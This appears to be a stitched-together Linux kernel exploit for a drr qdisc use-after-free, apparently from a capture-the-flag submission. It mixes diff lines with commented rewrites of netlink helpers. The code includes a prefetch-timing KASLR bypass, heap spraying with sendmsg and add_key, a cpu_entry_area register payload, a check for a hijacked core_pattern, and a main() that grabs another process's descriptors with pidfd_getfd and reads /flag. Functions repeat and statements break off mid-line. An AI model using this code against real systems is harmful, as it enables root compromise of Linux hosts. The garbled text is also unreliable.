AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "netem", 6); + + struct tc_netem_qopt opt = {0,}; + 
+ opt.latency = latency; + opt.limit = 1000; + + addattr_l(msg, 0x1000, TCA_OPTIONS, &opt, sizeof(struct tc_netem_qopt)); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int add_qdisc_tbf(int fd, uint32_t parent, uint32_t handle) { + char *start = malloc(0x1000); + memset(start, 0, 0x1000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWQDISC; + + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "tbf", 4); + + struct tc_tbf_qopt opt = {0,}; + opt.rate.rate = 1000 * 1000 / 8; // 1Mbit + opt.limit = 0x1e54; + opt.buffer = 0xb8d080; + + uint32_t burst = 1514; + + struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); + addattr_l(msg, 0x1000, TCA_TBF_PARMS, &opt, sizeof(struct tc_tbf_qopt)); + addattr_l(msg, 0x1000, TCA_TBF_BURST, &burst, sizeof(uint32_t)); + addattr_nest_end(msg, tail); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int add_class_drr(int fd, uint32_t parent, uint32_t handle) { + char *start = malloc(0x2000); + memset(start, 0, 0x2000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg = msg + msg->nlmsg_len; + 
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWTCLASS; + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "drr", 4); + struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); + addattr_nest_end(msg, tail); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int del_class_drr(int fd, uint32_t handle) { + char *start = malloc(0x2000); + memset(start, 0, 0x2000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg = msg + msg->nlmsg_len; + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST; + msg->nlmsg_type = RTM_DELTCLASS; + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = TC_H_ROOT; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); + + addattr_nest_end(msg, tail); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + return 1; +} + +int add_filter_basic(int fd, uint32_t parent, uint32_t classid) { + char *start = malloc(0x2000); + memset(start, 0, 0x2000); 
/*
 * Issue one sendmsg() on a fresh UDP socket with `buff`/`size` supplied as
 * the ancillary (control) buffer and no data iovec.
 *
 * The destination is 127.0.0.1:6666. The result of sendmsg() is not
 * inspected and the socket descriptor is not closed by this function.
 * NOTE(review): presumably the point is only to have the kernel copy `size`
 * caller-controlled bytes while handling the call; confirm against the
 * write-up.
 */
void spray_sendmsg(char *buff, size_t size) {
    int udp_fd = socket(AF_INET, SOCK_DGRAM, 0);

    struct sockaddr_in dest = {
        .sin_family = AF_INET,
        .sin_port = htons(6666),
        .sin_addr = { .s_addr = htonl(INADDR_LOOPBACK) },
    };

    /* Only name and control fields are set; iov stays NULL/0. */
    struct msghdr request = {
        .msg_name = &dest,
        .msg_namelen = sizeof(dest),
        .msg_control = buff,
        .msg_controllen = size,
    };

    sendmsg(udp_fd, &request, 0);
}
buff : calloc(1, size); + + if (!buff) + *(uint64_t *)&payload[0] = i; // Tag the key + + keys[i] = add_key("user", desc, payload, size, KEY_SPEC_PROCESS_KEYRING); + + if (keys[i] < 0) { + perror("[x] key_alloc()"); + return -1; + } + + return 0; +} + +#ifndef SOL_UDP +#define SOL_UDP 17 // UDP protocol value for setsockopt +#endif + +#ifndef UDP_SEGMENT +#define UDP_SEGMENT 103 // GSO segmentation option +#endif + +void loopback_send (uint64_t p, uint64_t size) { + struct sockaddr iaddr = { AF_INET }; + int priority = p; + char data[0x4000] = {0,}; + + int inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0); + + if (inet_sock_fd == -1) + err_exit("[-] inet socket"); + + setsockopt(inet_sock_fd, SOL_SOCKET, SO_PRIORITY, &priority, sizeof(priority)); + + int gso_size = 1300; + + setsockopt(inet_sock_fd, SOL_UDP, UDP_SEGMENT, &gso_size, sizeof(gso_size)); + + if (connect(inet_sock_fd, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] connect"); + + if (write(inet_sock_fd, data, size) == -1) + err_exit("[-] inet write"); + + close(inet_sock_fd); +} + +int ip_link_set_lo_mtu_1500() { + struct { + struct nlmsghdr nlh; + struct ifinfomsg ifinfo; + char buffer[NETLINK_BUFSIZE]; + } req; + + struct sockaddr_nl sa; + struct iovec iov; + struct msghdr msg; + int sock; + int lo_ifindex; + struct rtattr *rta; + + int mtu_value = 1500; + + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock < 0) { + perror("socket"); + return -1; + } + + lo_ifindex = if_nametoindex("lo"); + if (lo_ifindex == 0) { + perror("if_nametoindex"); + close(sock); + return -1; + } + + memset(&req, 0, sizeof(req)); + req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nlh.nlmsg_type = RTM_NEWLINK; + req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + req.ifinfo.ifi_family = AF_UNSPEC; + req.ifinfo.ifi_index = lo_ifindex; + + rta = (struct rtattr *)(((char *)&req) + NLMSG_ALIGN(req.nlh.nlmsg_len)); + rta->rta_type = IFLA_MTU; + rta->rta_len = RTA_LENGTH(sizeof(int)); + memcpy(RTA_DATA(rta), 
/*
 * Entry point of the listing: runs the preparation helpers in a fixed order
 * and then calls exploit().
 *
 * argc and argv are not used. There is no return statement; reaching the
 * closing brace of main returns 0 (C99 and later).
 */
int main(int argc, char **argv) {
    /* save_state() is defined outside this excerpt. */
    save_state();

    /* NOTE(review): presumably the same namespace setup as new_ns() in
     * exploit.c (unshare of user, mount and net namespaces); confirm. */
    new_ns();

    set_affinity(0);

    /* A zero argument asks the helper to determine the base itself (see the
     * `if (!base)` branch in the exploit.c variant). */
    bypass_kaslr(0);

    /* Interface setup comes before exploit(), which sends traffic. */
    ip_link_lo_up();

    ip_link_set_lo_mtu_1500();

    exploit();
}
/*
 * Measure how long one prefetch() of `addr` takes.
 *
 * Returns rdtsc_end() minus the rdtsc_begin() value taken just before the
 * prefetch. Despite the name, this function performs no cache flush and no
 * load; the only memory operation it issues is the prefetch.
 */
size_t flushandreload(void* addr)
{
    const size_t started = rdtsc_begin();

    prefetch(addr);

    return rdtsc_end() - started;
}
(uint64_t)ti; + } + + for (int i = 0; i < 16; i++) + { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) + { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) + { + if (times[ti] < minv) + { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) + { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (c == 0) + { + base = bases[i]; + } + else if (base == bases[i]) + { + c++; + } + else + { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (base == bases[i]) + { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) + { + base -= OFFSET; + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#else +#define START (0xffffffff81000000ull) +#define END (0xffffffffc0000000ull) +#define STEP 0x0000000000200000ull +#define NUM_TRIALS 15 +// largest contiguous mapped area at the beginning of _stext +#define WINDOW_SIZE 11 + + while (1) + { + uint64_t bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) + { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) + { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) + { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) + { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) + { + sum += times[ti + i]; + } + if (sum > max) + { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 
/*
 * Write the NUL-terminated string `text` to `filename` with one write() call.
 *
 * The file is opened O_RDWR | O_CREAT with mode 0600 and is not truncated.
 * A single write() is used on purpose: callers in this file target procfs
 * entries, where splitting the data over several writes would not be
 * equivalent.
 *
 * Failures are reported on stderr with perror(); the function still returns
 * normally, so callers keep their best-effort behaviour.
 */
void write_file(const char *filename, char *text) {
    int fd = open(filename, O_RDWR | O_CREAT, 0600);

    if (fd < 0) {
        perror(filename);
        return;
    }

    size_t len = strlen(text);
    ssize_t written = write(fd, text, len);

    if (written < 0)
        perror(filename);
    else if ((size_t)written != len)
        fprintf(stderr, "%s: short write (%zd of %zu bytes)\n",
                filename, written, len);

    close(fd);
}
+ req.nlh.nlmsg_type = RTM_NEWLINK; + req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + req.ifinfo.ifi_family = AF_UNSPEC; + req.ifinfo.ifi_index = lo_ifindex; + req.ifinfo.ifi_change = 0xFFFFFFFF; + req.ifinfo.ifi_flags = IFF_UP | IFF_RUNNING; + + memset(&sa, 0, sizeof(sa)); + sa.nl_family = AF_NETLINK; + + iov.iov_base = &req; + iov.iov_len = req.nlh.nlmsg_len; + memset(&msg, 0, sizeof(msg)); + msg.msg_name = &sa; + msg.msg_namelen = sizeof(sa); + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + + if (sendmsg(sock, &msg, 0) < 0) { + perror("sendmsg"); + close(sock); + return -1; + } + + close(sock); + return 0; +} + +int ip_link_set_lo_mtu_1500() { + struct { + struct nlmsghdr nlh; + struct ifinfomsg ifinfo; + char buffer[NETLINK_BUFSIZE]; + } req; + + struct sockaddr_nl sa; + struct iovec iov; + struct msghdr msg; + int sock; + int lo_ifindex; + struct rtattr *rta; + + int mtu_value = 1500; + + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock < 0) { + perror("socket"); + return -1; + } + + lo_ifindex = if_nametoindex("lo"); + if (lo_ifindex == 0) { + perror("if_nametoindex"); + close(sock); + return -1; + } + + memset(&req, 0, sizeof(req)); + req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nlh.nlmsg_type = RTM_NEWLINK; + req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + req.ifinfo.ifi_family = AF_UNSPEC; + req.ifinfo.ifi_index = lo_ifindex; + + rta = (struct rtattr *)(((char *)&req) + NLMSG_ALIGN(req.nlh.nlmsg_len)); + rta->rta_type = IFLA_MTU; + rta->rta_len = RTA_LENGTH(sizeof(int)); + memcpy(RTA_DATA(rta), &mtu_value, sizeof(int)); + req.nlh.nlmsg_len = NLMSG_ALIGN(req.nlh.nlmsg_len) + RTA_LENGTH(sizeof(int)); + + memset(&sa, 0, sizeof(sa)); + sa.nl_family = AF_NETLINK; + + iov.iov_base = &req; + iov.iov_len = req.nlh.nlmsg_len; + memset(&msg, 0, sizeof(msg)); + msg.msg_name = &sa; + msg.msg_namelen = sizeof(sa); + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + + if (sendmsg(sock, &msg, 0) < 0) { + perror("sendmsg"); + close(sock); + 
/*
 * Append one rtattr of type `type` with `alen` payload bytes from `data` to
 * the netlink message `n`.
 *
 * n      - message header at the start of a buffer of at least `maxlen`
 *          bytes; n->nlmsg_len is advanced past the new attribute.
 * maxlen - capacity of the buffer holding `n`, in bytes.
 * type   - value stored in rta_type.
 * data   - payload bytes; may be NULL only when `alen` is 0.
 * alen   - payload length in bytes.
 *
 * Returns 0 on success. Returns -1 and leaves the message untouched when the
 * arguments are invalid, when the attribute length does not fit the 16-bit
 * rta_len field, or when the attribute would not fit in `maxlen`.
 * Padding bytes after the payload are not written; the buffer is expected to
 * be zero-filled by the caller.
 */
int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
              int alen) {
    /* Negative sizes would otherwise wrap in the unsigned bound check. */
    if (alen < 0 || maxlen < 0 || (alen > 0 && data == NULL)) {
        fprintf(stderr, "addattr_l ERROR: invalid arguments\n");
        return -1;
    }

    size_t len = RTA_LENGTH((size_t)alen);
    size_t offset = NLMSG_ALIGN(n->nlmsg_len);

    /* rta_len is an unsigned short; refuse lengths it cannot represent. */
    if (len > UINT16_MAX) {
        fprintf(stderr, "addattr_l ERROR: attribute of %d bytes is too large\n", alen);
        return -1;
    }

    if (offset + RTA_ALIGN(len) > (size_t)maxlen) {
        fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n", maxlen);
        return -1;
    }

    /* The new attribute starts at the aligned end of the current message. */
    struct rtattr *rta = (struct rtattr *)((char *)n + offset);

    rta->rta_type = (unsigned short)type;
    rta->rta_len = (unsigned short)len;

    if (alen)
        memcpy(RTA_DATA(rta), data, (size_t)alen);

    n->nlmsg_len = (uint32_t)(offset + RTA_ALIGN(len));
    return 0;
}
/*
 * Send an RTM_NEWQDISC request that creates a "drr" qdisc with the given
 * `parent` and `handle` over the netlink socket `fd`.
 *
 * The request targets interface index 1 (hard-coded) and uses
 * NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE. No ACK is requested and no reply
 * is read, so the return value does not reflect the kernel's verdict.
 *
 * Returns 1 after the send has been attempted, or -1 if the request buffer
 * could not be allocated.
 */
int add_qdisc_drr(int fd, uint32_t parent, uint32_t handle) {
    enum { REQ_BUF_SIZE = 0x1000 };

    /* Zero-filled so header fields and attribute padding start out as 0. */
    char *start = calloc(1, REQ_BUF_SIZE);
    if (!start)
        return -1;

    struct nlmsghdr *msg = (struct nlmsghdr *)start;

    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWQDISC;

    /* The tcmsg payload follows the netlink header directly. */
    struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_parent = parent;
    t->tcm_handle = handle;

    uint32_t prio = 1;
    uint32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);

    /* Length 4 covers "drr" plus its terminating NUL. */
    addattr_l(msg, REQ_BUF_SIZE, TCA_KIND, "drr", 4);

    struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
    struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    /* Best effort: the send result is deliberately not inspected. */
    sendmsg(fd, &msgh, 0);

    free(start);

    return 1;
}
/*
 * Send an RTM_NEWQDISC request that creates a root "multiq" qdisc over the
 * netlink socket `fd`.
 *
 * The request targets interface index 9 (hard-coded) and carries 8 zero
 * bytes as TCA_OPTIONS. No explicit handle is set in the request.
 * NOTE(review): index 9 is presumably the veth device created by
 * add_veth_link(); confirm, since nothing here looks the index up.
 *
 * Returns the result of sendmsg() (bytes sent, or -1 on error), or -1 if the
 * request buffer could not be allocated. The buffer is released before
 * returning.
 */
int add_qdisc_multiq(int fd) {
    enum { REQ_BUF_SIZE = 0x1000 };

    char *start = calloc(1, REQ_BUF_SIZE);
    if (!start)
        return -1;

    struct nlmsghdr *msg = (struct nlmsghdr *)start;

    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWQDISC;

    /* The tcmsg payload follows the netlink header directly. */
    struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

    t->tcm_ifindex = 9;
    t->tcm_family = AF_UNSPEC;
    t->tcm_parent = TC_H_ROOT;

    uint32_t prio = 1;
    uint32_t protocol = 1;
    t->tcm_info = TC_H_MAKE(prio << 16, protocol);

    /* Length 7 covers "multiq" plus its terminating NUL. */
    addattr_l(msg, REQ_BUF_SIZE, TCA_KIND, "multiq", 7);

    char data[0x10] = {0,};

    addattr_l(msg, REQ_BUF_SIZE, TCA_OPTIONS, data, 8);

    struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
    struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    int sent = sendmsg(fd, &msgh, 0);

    /* The request has been handed to the kernel (or failed); drop our copy. */
    free(start);

    return sent;
}
/*
 * Send an RTM_NEWTCLASS request that creates a "drr" class `handle` under
 * `parent` over the netlink socket `fd`.
 *
 * The request targets interface index 1 (hard-coded), uses
 * NLM_F_REQUEST | NLM_F_CREATE and carries an empty TCA_OPTIONS nest. No ACK
 * is requested and no reply is read, so the return value does not reflect
 * the kernel's verdict.
 *
 * Returns 1 after the send has been attempted, or -1 if the request buffer
 * could not be allocated.
 */
int add_class_drr(int fd, uint32_t parent, uint32_t handle) {
    enum { REQ_BUF_SIZE = 0x2000, REQ_MAX_LEN = 0x1000 };

    char *start = calloc(1, REQ_BUF_SIZE);
    if (!start)
        return -1;

    /* The netlink header sits at the very start of the buffer. */
    struct nlmsghdr *msg = (struct nlmsghdr *)start;

    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWTCLASS;

    /* The tcmsg payload follows the header directly. */
    struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_parent = parent;
    t->tcm_handle = handle;

    uint32_t prio = 1;
    uint32_t protocol = 1;

    t->tcm_info = TC_H_MAKE(prio << 16, protocol);

    /* Length 4 covers "drr" plus its terminating NUL. */
    addattr_l(msg, REQ_MAX_LEN, TCA_KIND, "drr", 4);

    /* Open and immediately close an empty TCA_OPTIONS nest. */
    struct rtattr *tail = addattr_nest(msg, REQ_MAX_LEN, TCA_OPTIONS);
    addattr_nest_end(msg, tail);

    struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
    struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    /* Best effort: the send result is deliberately not inspected. */
    sendmsg(fd, &msgh, 0);

    free(start);

    return 1;
}
/*
 * Send an RTM_NEWTFILTER request that attaches a "basic" filter to `parent`
 * and directs matching traffic to `classid`, over the netlink socket `fd`.
 *
 * The request targets interface index 1 (hard-coded) with tcm_handle = 0 and
 * tcm_info = TC_H_MAKE(0 << 16, 0x300). The only option supplied is
 * TCA_BASIC_CLASSID. No ACK is requested and no reply is read, so the return
 * value does not reflect the kernel's verdict.
 * NOTE(review): 0x300 is presumably htons(ETH_P_ALL); confirm.
 *
 * Returns 1 after the send has been attempted, or -1 if the request buffer
 * could not be allocated.
 */
int add_filter_basic(int fd, uint32_t parent, uint32_t classid) {
    enum { REQ_BUF_SIZE = 0x2000, REQ_MAX_LEN = 0x1000 };

    char *start = calloc(1, REQ_BUF_SIZE);
    if (!start)
        return -1;

    /* The netlink header sits at the very start of the buffer. */
    struct nlmsghdr *msg = (struct nlmsghdr *)start;

    msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE;
    msg->nlmsg_type = RTM_NEWTFILTER;

    /* The tcmsg payload follows the header directly. */
    struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));

    t->tcm_ifindex = 1;
    t->tcm_family = AF_UNSPEC;
    t->tcm_parent = parent;
    t->tcm_handle = 0;

    uint32_t prio = 0;
    uint32_t protocol = 0x300;

    t->tcm_info = TC_H_MAKE(prio << 16, protocol);

    /* Length 6 covers "basic" plus its terminating NUL. */
    addattr_l(msg, REQ_MAX_LEN, TCA_KIND, "basic", 6);

    struct rtattr *tail = addattr_nest(msg, REQ_MAX_LEN, TCA_OPTIONS);
    addattr_l(msg, REQ_MAX_LEN, TCA_BASIC_CLASSID, &classid, 4);
    addattr_nest_end(msg, tail);

    struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len};
    struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK};
    struct msghdr msgh = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };

    /* Best effort: the send result is deliberately not inspected. */
    sendmsg(fd, &msgh, 0);

    free(start);
    return 1;
}
/*
 * Load 15 general-purpose registers from `payload` and then execute an
 * instruction that is expected to fault.
 *
 * The asm points rsp at `payload`, pops r15, r14, r13, r12, rbp, rbx, r11,
 * r10, r9, r8, rax, rcx, rdx, rsi and rdi from it in that order (so the
 * first 15 quadwords of the payload), and then runs `divq` with a memory
 * operand at absolute address 0x1234000.
 *
 * The function is declared noreturn and replaces the stack pointer, so no
 * normal return path exists; the asm statement declares no clobbers.
 * NOTE(review): presumably the exception taken on the divq makes the kernel
 * save these register values on the per-CPU exception stack, as the comment
 * on setup_cpu_entry_area() describes; confirm.
 */
static __attribute__((noreturn)) void write_cpu_entry_area(void* payload) {
asm volatile (
    /* From here on the stack pointer refers to the payload, not the stack. */
    "mov %0, %%rsp\n"
    "pop %%r15\n"
    "pop %%r14\n"
    "pop %%r13\n"
    "pop %%r12\n"
    "pop %%rbp\n"
    "pop %%rbx\n"
    "pop %%r11\n"
    "pop %%r10\n"
    "pop %%r9\n"
    "pop %%r8\n"
    "pop %%rax\n"
    "pop %%rcx\n"
    "pop %%rdx\n"
    "pop %%rsi\n"
    "pop %%rdi\n"
    /* Memory operand at a fixed address that this file never maps. */
    "divq (0x1234000)\n"
    : : "r"(payload)
);
__builtin_unreachable();
}
set_affinity(1); + signal(SIGFPE, sig_handler); + signal(SIGTRAP, sig_handler); + signal(SIGSEGV, sig_handler); + setsid(); + + while(1){ + write_cpu_entry_area(&payload); + usleep(1000); + } +} + +void spray_sendmsg(char *buff, size_t size) { + struct msghdr msg = {0}; + struct sockaddr_in addr = {0}; + int sockfd = socket(AF_INET, SOCK_DGRAM, 0); + + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + addr.sin_family = AF_INET; + addr.sin_port = htons(6666); + + msg.msg_control = buff; + msg.msg_controllen = size; + msg.msg_name = (caddr_t)&addr; + msg.msg_namelen = sizeof(addr); + + sendmsg(sockfd, &msg, 0); +} + +#define USER_KEY_PAYLOAD_HEADER_LEN 0x18 +int keys[0x1000]; + +/* +* Allocate a user_key_payload structure. +*/ +int key_alloc(int i, char *buff, size_t size) +{ + char desc[256] = { 0 }; + key_serial_t key; + char *payload; + + sprintf(desc, "payload_%d", i); + + size -= USER_KEY_PAYLOAD_HEADER_LEN; + payload = buff ? buff : calloc(1, size); + + if (!buff) + *(uint64_t *)&payload[0] = i; // Tag the key + + keys[i] = add_key("user", desc, payload, size, KEY_SPEC_PROCESS_KEYRING); + + if (keys[i] < 0) { + perror("[x] key_alloc()"); + return -1; + } + + return 0; +} + +#ifndef SOL_UDP +#define SOL_UDP 17 // UDP protocol value for setsockopt +#endif + +#ifndef UDP_SEGMENT +#define UDP_SEGMENT 103 // GSO segmentation option +#endif + +void loopback_send (uint64_t p, uint64_t size) { + struct sockaddr iaddr = { AF_INET }; + int priority = p; + char data[0x4000] = {0,}; + + int inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0); + + if (inet_sock_fd == -1) + err_exit("[-] inet socket"); + + setsockopt(inet_sock_fd, SOL_SOCKET, SO_PRIORITY, &priority, sizeof(priority)); + + int gso_size = 1300; + + setsockopt(inet_sock_fd, SOL_UDP, UDP_SEGMENT, &gso_size, sizeof(gso_size)); + + if (connect(inet_sock_fd, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] connect"); + + if (write(inet_sock_fd, data, size) == -1) + err_exit("[-] inet write"); + + close(inet_sock_fd); +} + 
/*
 * Report whether /proc/sys/kernel/core_pattern currently starts with
 * "|/proc/%P/fd/666".
 *
 * Returns 1 when the first 16 bytes of the file match that prefix, and 0
 * otherwise, including when the file cannot be opened or read.
 */
int check_core(void)
{
    static const char expected[] = "|/proc/%P/fd/666";
    const size_t expected_len = sizeof(expected) - 1;
    char buf[0x100] = {0};

    int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
    if (core < 0)
        return 0;

    ssize_t got = read(core, buf, sizeof(buf) - 1);
    close(core);

    /* Fewer bytes than the prefix (or a read error) cannot match. */
    if (got < (ssize_t)expected_len)
        return 0;

    return memcmp(buf, expected, expected_len) == 0;
}
+ + // wait for netem delay + usleep(50*1000); + + // preventing `drr_delete_class()` from calling `list_del` because `drr_qdisc_trigger` has a qlen of 0 + loopback_send(drr_class_trigger, MTU_VALUE); + + del_class_drr(sockfd, drr_class_trigger); + + // wait for destroy + usleep(50*1000); + + // make the qlen of drr_qdisc_trigger 0 + loopback_send(drr_class_delay, MTU_VALUE); + + del_class_drr(sockfd, drr_class_uaf); + + // wait for destroy + usleep(50*1000); + + add_qdisc_multiq(sockfd); + del_qdisc_multiq(sockfd); + + // wait for destroy + usleep(50*1000); + + uint64_t fake_qdiscs[SPRAY_SIZE/8] = {0,}; + + fake_qdiscs[1] = PAYLOAD_LOCATION(1); + + for(int i = 0 ; i < SPRAY_COUNT; i++){ + spray_sendmsg((char*) fake_qdiscs, SPRAY_SIZE); + key_alloc(i, (char*)(fake_qdiscs+USER_KEY_PAYLOAD_HEADER_LEN), SPRAY_SIZE); + } + + loopback_send(drr_class_uaf, MTU_VALUE); +} + +int main(int argc, char **argv) { + set_affinity(0); + + bypass_kaslr(0); + + if (argc > 1) + { + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Get flag and poweroff immediately to boost next round try in PR verification workflow*/ + system("cat /flag;echo o>/proc/sysrq-trigger"); + } + + if (fork() == 0) // this process is used to trigger core_pattern exploit + { + sleep(1); + set_affinity(1); + setsid(); + crash(""); + } + + char *core = (void *)mmap((void *)MMAP_ADDR, MMAP_SIZE, PROT_READ | PROT_WRITE, 